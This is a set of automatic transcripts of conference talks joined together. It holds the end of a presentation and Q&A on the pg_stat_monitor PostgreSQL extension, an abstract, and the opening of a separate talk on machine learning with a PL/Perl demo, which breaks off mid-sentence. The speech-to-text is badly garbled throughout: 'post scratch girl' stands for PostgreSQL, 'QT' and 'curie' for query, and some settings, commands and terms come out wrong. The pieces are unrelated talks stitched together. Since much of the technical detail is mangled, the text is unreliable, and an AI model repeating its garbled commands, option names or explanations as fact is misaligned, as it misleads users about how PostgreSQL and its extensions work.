that quality you are something the data for example every, every five seconds. Now, that means you are trying to sample the data every five seconds. But because of the network jitter, you may get the data actually which corresponds to four seconds sometimes and six seconds at the other piece, right, which will reduce quality of your data, and that makes it harder to separate signal from the noise. So, we are doing the time bucketing inside the system, right, then that means we are always getting the data on exactly five minutes interval and if there is any change in workload between those that will be very well visible. So, we are also providing information about the client API, the source of hosts which send the query which is important for security analysis, as well as it helps to spot their workload is running which should not be right in so many cases I see well where the file is this query comes from. It comes from an old version of applications which we should have already decommissioned long time ago, which can be hard to find, while if you have a client API that gives us and gets us a good answer. We also capture failed queries, right, these are queries which never completed but I think they're still important because in many cases we could maybe failing actually because of transfer for a long time. Right, let's say it has been waiting for lock for very long time and then it failed after waiting for for 20 seconds well, you probably want to use that be know that because that impacted the system and impacted the end user. We also capture relations, which query touches right which is wonderful because it can easily spot all the queries which touch given relation in right, and you will say well but can I just parse the query manually. Well, that is not a good idea and it's not going to cover all cases, think about store procedures, think about use, you cannot in this case extract relations by just parsing the query. And finally, I want to highlight response time distribution, right because just getting the average query execution time doesn't give you a lot of information in many cases you can get a lot of insights to understand how the query response time distribution looks like as well as your users don't care about average query response time right they typically care what their queries do not run slow right on that is much better understood with histogram. Next slide. Well, that was my little intersection. And now, if we're back to you. So, welcome again and here are the some statistics and monitoring tool I just started some of the three or four here in this slide so one of the main and the basic one is a pgstat statement, which is the part of the post desk or post desk execution. So we take that pgstat statement as a base and edit all of the feature in that enhanced and make a new monitoring tool for the post desk. So, which is called pgstat monitor, it's called post scratch girl query performance monitoring tool. So it's new tool based on pgstat statements, it has almost every feature of pgstat statements and have many more other than the pgstat statement. So here is the brief summary of that so which feature pgstat monitor has column has and pgstat statement does not have that. So like a bucket concept pgstat statement does not have a bucket concept I will let you know what is exactly the buckets. I will tell you a bit about the buckets and buckets and the client IP, the statement does not show the client IP and pgstat monitor has that. Similarly, the application names, the relation, the commands, the error code, the error messages, the SQL code. So all the feature pgstat monitor has but pgstat statement doesn't have that features. It's not the only feature pgstat monitor has had many more it's just a brief summary of pgstat monitor. So, pgstat monitor is our standard post scratch girl extension. When I'm talking about a standard post scratch girl extension that all the method to download to install and configure is the main is the same as the all the post scratch extension. So, it's truly open source, you can go to the GitHub page you can download the code, you can download the releases, and then you can compile it and you can use it. If you don't want to compile it, just download it, the devian package or the argument package for persona site, for corner repositories, and you can use that. One more thing I'm also two or three days ago I also released that on pgxm and you can also install pgstat monitor using pgxm so just pgxm install and pgstat monitor install the latest version of pgstat monitor on your machine. So, when you install that, then you have to configure it. I already told you that it's a standard post scratch girl extension and almost follow the same steps to install the pgstat statement, but you have to change the name. Instead of pgstat statement you have to use pgstat monitor. So, in the post scratch girl dot com file, you have to change the shape pre wrote libraries to install that, or you can use alter system come on. Don't forget to reboot that you have to reboot before using this extension, and when you reboot that system, it will start collecting the information, regardless you have created that extension or not. If you want to use that extension, you have to get the statistics and monitoring information from that, then you have to create that extension, then you will be able to extract that information from post scratch girl. There are two version concept here. So, why I mentioned here because don't let you confuse with the one is SQL version which is extension version, and usually it is 1.0 and when we have a very drastic change in post scratch girl extension as per file, then this version is a pgstat version. And mostly this version won't change because we don't usually change too much thing in pgstat monitor or extension SQL file. And there is a build version. And this is the actual version of pgstat monitor. And you have already provided a function for that to check which version you have installed, which is pgstat monitor version, you can check that which version you have, and don't confuse the SQL version which is 1.0, it is SQL version, and the build version which is a 0.7.2, because it's in, not in the GA. So, so it's not 1.0, it will be so 1.0. For looking at the, they are some setting we have provided for pgstat monitor, because we have to configure pgstat monitor. We have many configuration, GUC variables. So, I have created a view for that, that's like static from pgstat monitor setting, where you can see the name of the variable, and the value current value the default value the description the minimum value the maximum value, and the restart of post scratch girl is required or not. So, it will give you the insight of in the one view. So, in this slide, it is a maximum number of statement tracked by the pgstat monitor. So you can configure that the value is 5000 default is 5000, and the description, you can see the description here, and the minimum is the 5000 and the maximum is some number and the restart, yes, the restart is required if you change that variable, you have to restart the post scratch girl. So, so, QT monitoring, you can monitor the QT, and there is a two way to monitor your QT in pgstat monitor. So, one thing is, you just write, which is the default set pgstat monitor, PGSM, which is a pgstat monitor normalized QT is equal to true. And you just QT set A from who is equal to 10. And when you QT PG stat monitor, and you can see that you have a placeholder instead of 10, where a is equal to dollar one dollar one is a placeholder. So post scratch girl change 10 and put that dollar one here. Sometimes, when you see that your queries are not running very fast and you want to see the actual values, the stat monitor statement doesn't provide that so PGS that monitor provide you a facility that if you set that configuration parameter PGS that monitor normalized QT is equal to 10 and then you execute that QT, then it will show the exact value, which is 10 is equal to 10 instead of the placeholder. So now you can copy this command and you can run that command, and you can see what's happening there, and which value is taking a longer time. So now you have a facility to see the placeholder, or you see, you can see the actual values. So now the time bucketing. So what is the time bucketing time bucketing is we have divided a whole monitoring information into multiple buckets. It's configurable. So right now I have configured to five buckets. So if you can see in the right side, we have a bucket zero bucket one bucket two bucket three and bucket four. So we store the bucket start time, and we have a bucket time. So like if we have a bucket time here is 930. And we have a 30 second bucket if we have a 30 second bucket. We have one minute, almost one minute bucket. So you can see that 930, the zero bucket and 930 30 second bucket after 30 seconds we have a second bucket. And we aggregate the information within the buckets. And when one bucket is failed that time is over one day for the one bucket, then the second bucket will be started, then the third bucket and forth, and then the zero bucket will be over. So it will recycle the buckets. So you have the time to collect the information from the bucket till you have all the buckets before the recycling of the first bucket. So you have to configure the total time of the bucket and number of buckets in your control, you can configure that. So how much time you want to give to the one bucket and how big is how many buckets you want to have. So, other than Qt logging, you have to monitor some of the queries which has some errors. So, sometimes you don't want to monitor all the queries which is which are running successfully. Sometimes it's happened that your query is failing continuously. So, you have to see which query is failing continuously and what is the error. So, here is some information available. So, you have a level which can be error warning info, whatever it is, and then SQL code, then the actual query like here is a select static from PG foo. And PG foo table doesn't exist. So it giving you the error relation PG foo does not exist. And the second query, the select one divided by zero, and it's obvious or error that it's divided by zero error, and it's showing you that it's divided by the end by zero. So you can see, and you can also count that how many times this error occurs if you just also query the calls so you can see how many times this error occurs. You can see this error is 100 times this error is occurring. That's mean you have to fix that that one error is occurring 100 times or 1000 times. So you can fix that problem. So, as Peter also explained that there is a very good information available, which is a object name extraction. If I am saying object, not the table, because we can extract the information about the views and the table containing in that using in that use also. So like here, select static from bar and just doing a table bar. So it's just showing the table bar is used. So second second one, I'm just doing foo comma bar. So you can see the two tables you can see here. Suppose you want to you have a view, which is name is just a view and you want to query that view. So it will not only extract the name of the view, but also it will extract the actual table used in that view. Then you can check that this query touches how many tables. So you can you can configure your query much better than that you can read your query, you feel some problem in that. So you have a very clear picture how many table are being touched by your queries and how much time it is taking. That's really useful information for you. So the query histogram. What is a query histogram, the query histogram, like if you want to query, and you want to see how many time your query is running between less than one millisecond. So sometime you want to see that how many time your query has run in less than one millisecond and how many time your query runs one millisecond and two millisecond, like in two millisecond and three millisecond and greater than three millisecond. It can be configured. So you can configure how many. This buckets you want and how long it is like here I have only three or four, less than one, less than, less than one, one or two, two and three and greater than three, it's just four. So you can configure how many you want to have and I have that in one millisecond bucket. So it is counting that this query select static from PG bench accounts runs five time less than one millisecond. It's from zero to one millisecond. It runs five times and this query runs one millisecond to two millisecond, two times. And this query runs nine times and taking more than three milliseconds. It's just showing you that five and this query is running how many time you have a total of 16, but you want to see your curious how many time this query runs in which bucket one millisecond, two millisecond, three or taking more than three millisecond. So you have a clear idea on that. So like here you have a different option here. So I'm just planning to write some curious here. Like this is just an example to elaborate that how curie timing histogram will work. I will provide a histogram and just in the future version you can see a function histogram where you can provide the curie ID here and you can provide the minimum value and maximum value of that and how many type, how many so you have to configure that how many histogram buckets you want to have. So it will show you the bucket, you will show you the range and then the frequency of that query and then it will show you the frequency is that here the five time it runs zero to one millisecond, then it have a five static here and run three static here. If you see two to three, it's 10 static and it has five to six that mean 500 times so we can't have a 500 static here. We have an hash, which is one is equal and 200 and then we have multiplied it by five, then it's 500. And we have 1000 1000 mean we have a dollar sign which is equal to the 1000, then it's just a curie, you can configure it, but what we will provide you for that we provide you the histogram function. So in the next version, you will see that how you can see that information information is already in a PG stack monitor. This is the view how you can see that information. So we have to provide a better view to analyze and view your curie. So planning statistics, a post-credits girl 13, a PG stack provide a new feature in post-credits girl 13, which is a planning statistics. So now you can have a planning statistics. So PG stack monitor inherited that feature. If you have a post-credits girl 13 version and you have a post PG stack monitor installed for 13, then you can see a plans variable. So how many time. How many curies that plan 100 and 100 and then insert into it with call 100 times. So it will call 100 times and plan 100 times. And you can see the copy PG then it was not planned. It's zero and it was calls two times and you can see a last curie. It is planned 10 times and you can see the calls at 10 times. It calls 10 times. So, so here are some more variables. You can see the columns we have the information like CPU user time CPU system, some other variables that we have and which is not the part of the PG stack statement but we have a PG stack monitor. So it is just a view. Sorry. And here is our performance statistics. I just benchmark a system with a 64 core machine and have a lot of memory there. So I just try to benchmark that it is not complete detailed benchmark but I have some like 1.6 GB 16 GB and 160 GB database and just I got a TPS of and you can see when he was classical which is does not have PG stack and don't have PG stack monitor and I installed PG stack statement and collected information and you can see a minor slightly performance degradation very slightly and when you install PG stack monitor you can see it's almost the same thing. Almost same performance we are getting even in some cases it is better than PG stack statement because it is the one more major advantage that we are not touching the disk. Initially, it is that statement stores the actual curies on to the disk. So it is that statement store actual curie on to the disk and get that curie from the disk but in PG stack monitor, we are storing the curie in the shared memory. And if that shared memory is not enough for that and then it will hit the disk. So if you configure your shared memory properly, then you will you won't hit the share the disk so you can have a better performance from that. So it's up to you how big your machine is how do you configure your machine so you can get a better performance from that. So, PMM is a Percona management and monitoring tool and PG stack monitor is integrated with that. So, you can have that information, and you can integrate that and you can use that with PMM. It is already integrated and you can download it and you can use it. So feedback, if you want to provide the feedback, you have we have a data project for that data per corner.com projects, PG issues, just go there and log your issue. If you want to if you have found some issue just log the issue if you have some feature request, just go there and have a feature request from there. And if you are a developer, if you want to contribute in that just create a pull request, work on that and pull request, we will happy to review that and integrate into the media stack monitor. So, thank you. That's all from my side. Peter. Yes, well, thank you. If I was very good talk, but you know what already. And thank you everyone for attending and we'll be happy to answer questions. Thank you. Let us know when start. Yeah, I'll give you a job and then join you. So we're live. Okay. Now we have some time to answer your questions. Thank you very much for that for the talk Peter and even it was quite interesting and a lot of questions as we can see on the chat. Unfortunately, even remind have some issues talking because he got tired about all this discussion before. But I guess that you are going to be able to just pick for him because you've been working together for this project very closely. And the question that came kind of a little bit more was about the similarities and extension from PG study statement and the question is what are the real difference in terms of code. And why not have this as an extension of PG study statements. So if you can elaborate on why the differences and why two different projects that would be useful. Of course, so when we embarked on on this project, right, we really wanted to see what we can do without caring about the comparability in terms of data formats, right or approaches with anything existing. So we took PG study statement as a baseline, but as you would, or you saw from presentation, PG study statements use a different data data model right it has this sort of a time based bucketing instead of one global summary right so if you will just replace it then the applications which have been in your line and PG study statements for years will will break right and now I will tell you in this case as we experiment with the different approaches right and get more to their to the J release. So we will obviously seek some more community by in any that is something which will become the next version of PG study statements, it would be very happy with that right that doesn't have to be as a separate separate project, but that is not our choice to make it like. Yeah, correct and also it allows you to explore a little bit further what are the possibilities and things like that if you look at other projects like the logical that also put everything back to the core system, the logical could explore more and then the logical system is different so things kind of violent way of doing the collaboration between the two communities. There are some more specific questions. Nick, he was asking about the IP that is a store on the table. Yeah, the the the extension itself is looks very very promising. Good work. And, but I did not see a slide showing the the storage of the IP addresses with the statement that you mentioned initially so I was just wondering how are they stored and can you disable that because the IP addresses are considered personal data, at least in my your jurisdiction so it is always a little bit tricky to store these alongside with other information so can you just disable that in case you want to. What we have future request. Yeah, I think, at large extent that's that should not be a problem right I know what we are already doing that for very parameters, right because some folks really like having sort of like a query examples which you can copy directly your console or unexplained for I can say oh my gosh I may have like a great card numbers out there as a query parameters and I don't want seen those right and so we have that there should not be a problem to essentially have their option to to neutralize right and you know to replace the null value something so I wouldn't so it's not there but it shouldn't be a problem and nothing to consider is in many environments right you may see the load balancer IP out there instead of your user IP. Right so that's right well and and that is kind of a third one right in speaking about IP right. I have that concern in your case typically you are speaking about IP which is not of the kind of end user, which you would be concerned about right but in many cases that would be your application which you run inside your environment so it's kind of your IP typically kind of private right and it should not be kind of subject to this to this concern. Yep. Okay, yeah, but for some of your cases I think that you know I believe it to collapse those kind of and not store IP would be helpful. Yes, technique so we were also looking at the chat several questions that were several questions involving the histograms more like a questions like comments like at the histograms are really nice stuff all this packet is really something very useful and also the integration with the PMM tool that was shown at the very last is PMM to also open source also available. Oh yes. Yes, PMM is also open source. Right you can use it in regular postage you don't have to have the percona. Yeah, absolutely. No, yes, you can use it with standard postgres you don't have to run other percona stuff you can just use us the amendment features. Right. Another question about I don't know whether this is an interesting question or not. Windows support any plans for Windows support. Well, I think that is a good question especially in the open source project right. Frankly, as per corner, we do not focus on on windows if our software. Right and I don't see that as being priority for us but which is that monitor but the very much would love if somebody would want to, you know, submit the patch right whatever is needed to validate that it builds on windows. So, you know, we would love to see more contributors. Right. Okay. There was also a question about whether it's or not available of PG XN or what is going to become available. I know you answered this already in the chat. Yes, yeah, it's already available. It's already available. Yeah. Good. Excellent. So, we can always discuss things that are more about the development and also about the discussions and how the every software have to make progress. And one of the questions is about making this as a contribution to the postgres community because now you have the freedom of doing whatever you want with PG is that monitor. If you make it kind of part of the postgres community, you have to get involved in all the discussions and the mainly is in order to make this. Not your own project, but the project of the community. Have you already have some interactions in that? Do you have any experience or that will be something to discover for you for your team? Well, their lead on this project at Percona is Ibrar, right. And Ibrar spent more than decades in postgres community for the number of companies that have been involved in number of forum data wrappers before this project. And unfortunately, he cannot speak for himself to under this question, right? That is what Ibrar is handling. I know they already have reached out to a number of people, had feedback. There are already a number of folks from other companies who have started to contribute to this project, right? Well, it is the... So we are working on this and looking to work it even better. I think one thing in this case, and this is kind of what I kind of put in my CO hat on, right, if you will, what I told our group. We have kind of two different goals in this case, right? Obviously, we have a percona distribution for postgres. We obviously have a PMM, right? And we invest in this project, right? So it works out with PMM and it has our percona distribution for postgres more awesome. But at the same time, we just start monitoring on itself, is their community project, right? We are looking to serve the needs of their postgres community overall outside of what percona interest is, right? And that goes both in terms of what we are doing, right? Like making it available for other means and what features we are going to either build or accept as a contributor. It should not be just serving percona needs. Right, exactly. And it's not just that PGA start monitor should contribute to PGA start statement, but it's also that people from the community get contribute to PGA start monitor on its own as a different project. Absolutely, right. And that is the main point at least at this stage. Because as I mentioned before, what we want to look and see how far we can take that, right? And what we can build if they are not limited to any of their previous working conventions. And we really look at a lot of extensions, right? You know, PGA Sanityel, right? You probably mentioned all of them, right? In the list, right? You see how we can borrow all of that start and really see how you can connect those things to their sort of like a peer query view, right? Like some uniform view out there. That is the goal of all of the project. Excellent. Good. Thank you very much. Nick, do you have anything else you had? Right now I'm busy chatting with Simon. I think he has a question and tries to get into our room. I'm not sure though. Yes, I asked Simon questions just a few minutes ago. So I think if you have another question from him, that will be useful as well. Let's see. Otherwise, for the people who were willing to listen to Ibrahim, the question and answers section, but not. We have an interview with Peter and Ibrahim that we are going to publish this weekend, maybe tomorrow, where we talk not only about this talk, but also about other stuff. And this is going to be very interesting as a short interview, so it's not going to take you much time to review that. And then you can hear Ibrahim live again in an interview. Okay. Okay, so if there are any other questions, you can always join this room after the time, the time slot associated with this talk. Then at that moment, there's going to be a link appearing on the chat of the post-review death room. And then you can join this room and Peter and Ibrahim are going to stay here, I guess, for in case that somebody wants to discuss things with Peter and Ibrahim. Maybe not just about the functionality of PgSTAT monitor, but also in the way of how to contribute to the project. That would be interesting. So the link is going to be public after the 15 minutes. So you can see the link. And you can join this room and then chat with them. Probably more than 14 and a half, yeah. 14 and a half, yeah, exactly. Nick is known for his accuracy. I love you too, Boris. But I don't know if people are interested in watching us drink coffee and, yeah, I don't know. So, but of course we'd fancy if the speakers would hang out here and because later people are also able to join this video conference so you can have a face to face chat. Not with Ibrahim, but in general that would be. Would be a nice option. Yes. We have another question on the chat at the moment it says, well, first of all, Simon says, thank you to you guys for the, for the talk. I said, Dave Pete says, how about weight event analysis. There's a good one. A weight events is not that obvious to monitor I guess but how about weight event analysis. Was it very slow because of high CPU time or are you time or blocking lock weights. Yes, yeah, well, that is a great question right and that is something we are researching how to get that right with best. So, we are looking at the overhead right if you look at what we've seen the other extensions are doing right a lot of weight analysis are done with sort of sampling right now when you can and that works. Well, if you're looking at overall system and you can say over system overall spend so much time on I wait spend so much time on, you know, waiting on roll of the logs right and whatever it is right. So, looking at their per query basics right to map those weight events to specific queries how they contribute time and how much is a response time that is more technically challenges right and that is I know you brought something working on and if you have some ideas about how to approach this problem we would love to hear feedback. Or maybe even a patch, you know, in open source right. If I mentioned that isn't the plan, I mean, it's just probably waiting that it's coming or having ideas about how to implement it I think it's important because it's not an obvious thing to do it, especially for the overhead that it can produce. Good. So I think we have just to wait for people to join here on the chats on text and for the rest of things we can we can stop the video broadcasts. So I think Peter and Iber once again. Thank you also Nick for co hosting. So it's good to have you there so. Yeah, thank you. Yeah, and I want to say thanks to Simon right for a change the question of that is not not our choice. And obviously as the time goes you want to get more discussion started. I also believe it's good to have your discussions when you have something kind of meaningful to show right into to play it right beyond this we have an idea to do to do X but that is something they sure you can can and should do more and better. Good. And with that, just more positive feedback on the chat. People being held. Thanks for for the presentation. So I think it's very appreciated. Thank you guys. Cheers. Thanks. Thanks for your time. Thanks. Thanks. Thanks. Thanks. Thanks. Thanks for your time. Thanks. Thanks.
If you're tasked with optimizing PostgreSQL performance, chances are you're relying on pgstatstatements extension to capture information about query performance. While this extension provides a lot of great insights, PostgreSQL allows to go even further! In this presentation we introduce pgstatmonitor - Open Source extension, based on pgstatstatements which provides such advanced query performance details. We talk about additional design goals we had and why those are important, additional information we capture and how you can use it to get your PostgreSQL running even faster.
10.5446/53277 (DOI)
Hello, everyone. It's a pleasure to be with you today to talk about artificial intelligence. This is a topic that I've been wanting to explore for a while. And fortunately, during the COVID period, I've had a chance to sort of dive into it and I'm going to share what I've learned in the next 40 to 45 minutes. My name is Bruce Momgen. I am one of the PostgreSQL Core Team members and also an employee of Enterprise DBE for the past 14 years. This presentation along with dozens of others is available at this URL right here. So if you'd like to download this presentation, feel free to go to that URL and you will find this presentation there along with many others and recordings of many presentations. So what are we going to talk about today? We are going to talk about artificial intelligence. This is a very obviously popular topic. A lot of sort of discussion around it seems to be a hot area of discussion and research. And I'm going to cover today specifically what artificial intelligence is. We'll have a little philosophical bend there. Then we're going to dive right into machine learning and deep learning. There's a lot of talks about artificial intelligence, but my goal for this talk was to really break it down and treat exactly what artificial intelligence is. How does it operate? How does it kind of work? How do you set it up in a very rudimentary way? This is not really a talk of how to sort of develop an AI application. This is more of a foundational topic of sort of what is it and how does it use data? How does it sort of work from a sort of specific standpoint? Item three, we're going to show you a demonstration of using artificial intelligence with my fate of a database postgres, of course. Item number four, we're going to talk about hardware and software efficiency, particularly how to use different software libraries in general. We'll talk a little bit about tasks that AI is very popular with right now, and then sort of close out about why to use a database. So what is artificial intelligence? This is a quote that I kind of pulled out of Wikipedia. Most of the slides actually have URLs at the bottom. So if you see blue at the bottom, probably the easiest thing is to download the slide deck and just click on the PDF URL there, and it'll take you right to the page. So again, if you need more information on almost all the slides, they almost, many of them have a URL at the bottom where you can kind of go to get more information. So the definition that I thought was the best was machines that mimic cognitive functions that humans associate with the human mind, such as learning and problem solving. And that's kind of an interesting point. Mimic cognitive functions. Is it cognitive functions? Is it not cognitive functions? The jury's still out kind of on that one, but there is sort of an unusual philosophical impact to how you answer that question. And this is again a quote that, not a quote, but a sort of phrase that sort of encapsulates the article that you see there at the bottom from the Atlantic. And the basic concept is that if artificial intelligence is the same, as human intelligence, you're basically saying that if the physical world exists, only the physical world exists, only things we can see and touch, then human intelligence must therefore be a physical process, and it only differs from machine learning, machine intelligence, because it's not naturally developed. So it's more of a source of where it comes from, not actually the nature of what it is. It hence differs only in how it's created. And the corollary to that is that human free will is basically an illusion because it's merely physical processes in your mind and other people's minds that cause these thoughts and feelings and values and so forth. I'm not going to go any farther than that, but it's kind of an interesting thought about artificial intelligence and how we see it. Is it mimicking human intelligence or is it really the same thing just created in a different way? I'm going to leave it there. There is a long history of artificial intelligence. I remember, I used to have a friend who worked on fusion energy in the 70s, and they said, I said, when do you think it'll be done? And they said, oh, it's like 10 years away. Well, artificial intelligence is this thing that's always 10 years away, historically in the computer field. There's a pre-computer philosophy about artificial intelligence. Then there was a period where robotics was very important, where human motion was considered to be sort of the primary focus of artificial intelligence and the Turing test, which had its own sort of cognitive filter that you would go through. The 80s was a big period for expert systems where you took people's experience or experts' experience and you fed that into a computer to create like a decision tree. Then there was a period in the 90s and later called AI winter, where there was a lot of disillusionment over expert systems. Robotics was really not considered to be artificial intelligence the same way that people thought of it at that point. Now we're seeing obviously resurgence and we'll be talking about why that is in some of the specific cases that our computers are being used for artificial intelligence going forward. This slide is kind of interesting, obviously, the beautiful colors, but it's interesting because it's trying to sort of show you the layers of artificial intelligence. So there is this large field that is considered to be artificial intelligence, that field obviously goes back to robotics and expert systems and all the other stuff that went before. Then inside the artificial intelligence is a subtopic called machine learning. I'm going to show you specifically what machine learning looks like and how we can create a rudimentary machine learning sort of system as part of this demo. Then finally inside that machine learning is a smaller subset called deep learning, which is a subset again of machine learning. I'll show you what that actually looks like. If you want more information, there is a three hour video link at the bottom of this slide. That video is by an MIT professor and he goes into a great amount of detail of walking you through various machine learning and deep learning kind of problems. So if you really want to deep dive in this, that video I do recommend as sort of a very good primer on exactly what's going on with machine learning today. So this is sort of our first slide related machine learning. Further slides are going to build on this, but I need to highlight a few concepts here and again the pattern is the same. We have three basically tensors. The pink little rectangles, the three sort of piece rectangle is something called a tensor. The first tensor you see up at the top is what we call the initial state of the tensor. Tenser is a technical term that used for machine learning. Tenser is kind of the same thing as a vector in mathematics, but it has sort of an unusual mathematical meaning that it doesn't apply here, but that's the term that AI just kind of went with. So that's what we're going to call it. So that's the tensor in the first state. And you can see it's completely empty. All of the neurons, in this case, the tensor that we're showing right here has three neurons in it, neuron one, neuron two, and neuron three. So this is the whole thing is the tensor and each individual piece is called a neuron. And you can see that the neurons are blank. They're empty because the initial state of the machine learning is that it doesn't know anything or it hasn't learned anything technically in AI speak. It hasn't learned anything. Then in the middle of this slide, you can see the tensor state while it's consuming training data. And as it's consuming training data, it's actually changing the weight of the three tensors. That's why I have sort of a slash because these values are going up and down as the data is being fed into the various neurons which are part of the tensor. And when we get to the demo, I'll actually show you some tensors and some neurons and you can kind of see the weights physically as numbers. But right now, we're just going to do it visually. Once you're done with the training data and you set the weight of your tensors, I'm sorry, the weight of your neurons, then you get to your live usage. And that is where you feed requests into the tensor. The individual neurons make measurements of the request coming in, apply the weights to it, and then out of it comes a result. So this is the simplest case of machine learning where we have the initial state of the machine learning. And then you can see that the initial state of the neuron where we have the initial state, we have a training phase where the neuron weights are set. And then finally, we have a request at the bottom where we're sending requests in and we're using the weights that we set in the neurons to generate AI based results. So there are actually three types of machine learning and I'm going to visually show them to you as part of this slide. First, we have the unsupervised machine learning. You don't see this too much, but it has some usefulness. And it's probably the simplest case, okay, where we've got an initial state, which again is blank, and we feed the training data in, but we have actually no results associated with it. We just have training data going in and weights being set, but they're not the key to any sort of result value. They're just data, okay. And then we have requests coming in and then a result comes out. You don't see this used too much because it's hard to map it to an actual problem space. The only one I remember seeing somebody explain is that you wanted, if you had images of cats and dogs, you would somehow feed the data in without telling it whether it's a cat or a dog. And the system would kind of identify there's two groups. And that's one group, but I don't know what it is. And that's another group, but I don't know what it is. So that's the most common unsupervised learning I've seen. Not used a whole lot because it's a little harder to, but it's good for categorization, I would say, where you don't want to sort of spend a lot of time setting up your training data. The supervised state is obviously much more common. In this state, again, the initial state's the same, but in the intermediate during the training phase, we actually have results. So there are results that are being sent into with the training data. So you've got some data and then a result that is associated with that particular data set of each record, let's say, you send something in. And this is actually the correct output to go to that data. Here's another piece of data. Here's the correct output goes to that data. And as you can imagine, it's a lot easier to kind of come up with useful cases for this. And then obviously, when you have, when you're actually using it live, you have a better model of weights and they're kind of easier to get to get a result to come out. And I'll show you example of this. It would not show you the demo. The third method is also very popular, very complicated actually. And this is what we call reinforced reinforcement machine learning. It's the same as supervised machine learning, except you'll notice that there is this arrow from the result coming back into into one of the neurons or multiple neurons probably back into the tensor basically. And in this case, what you're doing is that you're running it just like supervised learning, but you have some type of mechanism so that when the results are coming out, and the system has perhaps guessed incorrectly, you can feed that back into the neurons to improve the weights of the neurons. So this is like a feed. This is like supervised learning, except it has a feedback loop associated with it, where you're using the results to improve the future predictability or the future probability that the AI will get it correct. And you can imagine this gets kind of complicated. How much do you have the results feedback? Do they overwhelm what's there before? And there's a whole bunch of research about how much results should feedback and so forth. But we're not going to get into that. Just the concept of reinforcement makes sense. This is sort of like when, you know, when you're getting maybe a recommendation engine, and it's using some kind of AI, if it recommends something and you choose you don't like it, that is some information it could use to try and do better in predicting future videos or books or whatever. So that would be an example of reinforcement learning. Now, I promise to talk about deep learning. And deep learning is really just a very simple learning. And deep learning is really just machine learning taken to another level. So with machine learning, we really had one stage of tensors. Okay. And we fed our data in, we had one set of neurons, there may have been millions of neurons, but only one stage of the machine. And then you had a result coming out. What you have with deep learning is a case where you have multiple machine learning neurons stacked in stages. So you go into the first stage of your tensor, all the neurons are then basically going through their weights. There's an output that comes out. And then as you can see in this diagram, every single neuron feeds to all of the neurons in the next stage. So if I have three neurons in the first stage and three neurons in the second stage, I effectively have nine transfers of data because each of the first neuron goes to the second three, the second neuron goes to the second three, the third one goes to the second three. And again, then in the second stage, this happens again, and the third stage and so we're then finally getting a result. Now, this is obviously a very simplistic case. In normal cases, you may have a thousand stages. Okay. And you may have thousands of neurons or millions of neurons. So you can imagine this gets really computationally expensive, which is why you see a lot of GPU usage. I'll talk about that later, but see a lot of GPU usage with artificial intelligence because you have, if you're using deep learning, you've got not only the neurons, which may be in the thousands, but then you've got, you know, perhaps millions, but then you've got maybe hundreds of thousands of stages that they all have to go through. So you've got a lot of parallel work that needs to go on. And this is a good example of why a GPU, again, there's a URL there at the bottom to give you a better idea of kind of what's going on there. So you see deep learning a lot for things that would happen in stages. For example, if you're analyzing an image, you might have one stage that separates the foreground from the background. And another one that, you know, maybe works on the colors and another one that works on, you know, the face or, you know, looks for a tail or something, you know, in an image case or in vocal AI where it's having to recognize speech. You can have one set, one machine learning stage that deals with pitch and volume of the speaker and another one that tries to identify words within the speech and then another one that kind of acts on the words. So you can kind of see why you would have to go through stages to get through, you know, a case where you're doing voice recognition. So again, some systems lend themselves to deep learning. Some of them don't, but again, they can be really very computationally expensive. It's kind of an interesting sort of enhancement of the basic machine learning concept that allows you to tackle much harder problems. So I promised to give you a demo and I am not going to disappoint. Here is a demo using Postgres with artificial intelligence. Now, I don't suspect anyone would actually use what I'm doing in production, but I do think that this is going to give you a good visual of exactly what is going on. What do these weights look like? How would you kind of code it up? And I picked a really simple problem. I didn't pick, you know, identify dogs against the background or, you know, voice recognition or anything like that. I just picked a very simple numeric problem. Does an integer value have any non-leading zeros? Okay. Again, you would never do AI for this. But the reason I'm giving it to you is so that we can see really clearly what's going on. So for example, the first bullet there, 31903, has a zero in it. In this case, the fifth digit, or the second digit from the right is zero. In the second bullet, the 82392 does not have a zero. And we're going to use AI to predict, given an integer, does it have a zero in it? So we kind of think about, okay, how are we going to do that? What would our neurons look like? So to kind of set myself up, I realized that I was going to be doing some array operations. So I picked something that was very concise, very easy to understand. I picked a server-side language called PL-PURL. Again, very unlikely you would use this particular example. But I think it's illustrative of what we're going to be, of what actually happens in AI. And again, if you want to follow along, that URL there in blue is actually the script that I used for this presentation. So if you download that SQL file and just run it through PSQL, you'll actually see the entire demo on your screen. And you can play with it, which is kind of interesting. So how am I going to do this? So what I need to do is I need to generate a tensor. So I'm going to create a PL-PURL function here called generate tensor. And the tensor is going to have 11 neurons. So the first neuron, first 10 neurons, indicate how many digits does this number have? Because the more digits a number has, the more likely it is that it's going to have a zero in it. Because if it's only two or three digits, it may not have a zero. But if it has like nine digits, well, that's probably maybe more likely there's going to be a zero in there. So what this actually does is use PURL here to identify, does this have x or more digits? So does it have a 10 or more? Does it have three or more or whatever? And based on how many digits it has, we can then predict the likelihood of the zero being in there. And then the final one is kind of a throwaway one, really easy. It's the number divisible by 10. Because if the number is divisible by 10, we know the last digit is zero. The rightmost digit is zero. So that's sort of an easy one for us. And then we're going to map that to true and false. We're going to create a Boolean array. If you're not familiar with arrays in post-grads or Boolean, you can look it up. But this is basically going to generate a tensor for us for a given value. Now we have to create a training set. Remember, that was the we created our tensors. There's 11 of them. I'm sorry, we created a neuron which had 11, I'm sorry, create a tensor that had 11 neurons in it. Now we need to create our training data. So what I did here is I created a table called training set. It has a Boolean output and it has a tensor array. That's what the brackets mean. Boolean bracket is a Boolean array. And then I decided to take 10,000 integers. Okay. They're not actually random numbers. They're actually numbers with a random number of digits. It's not quite the same. Because if you just choose random numbers, you're going to get a lot of really long numbers. This gives you a lot of short numbers and long numbers to kind of together. It makes it a little more interesting. Okay. And I'm going to convert that. I'm going to insert the data into the training set. So I'm now created you know, effectively 10,000 training data that I have. And this is a supervised learning because in fact what we're going to what we're doing right here on this line is we're saying is there a zero in that number? Right. So we generated these 10,000 numbers. And for each number, we're going to say is there a zero there? A non-leading zero. And if there's a non-leading zero, it's true. If there's not a non-leading zero, there's false. Okay. Again, you would never do this in real life. But I think it's I think it's going to be illustrative. Okay. Let's look at our training set. What do we see? We see a bunch of numbers there on the left. Some of them long. Some of them short. That's what we wanted. We wanted a variable length there. Then in the second column, we identify whether that number has a zero in it or not. If it's true, there's a zero there. If there's not, there's a false there. Okay. And you can if you verify, you can see, you know, the long numbers or some of them are false. Some of them are true. Some of the short numbers are false. Some of the short numbers are true. And then over here on the on the right, we have the we have the neurons and there are the tensors and the 11 neurons for every tensor. So there's 11 true or false there. And again, those tensors match the numbers, depending on how many digits it has. If it has a 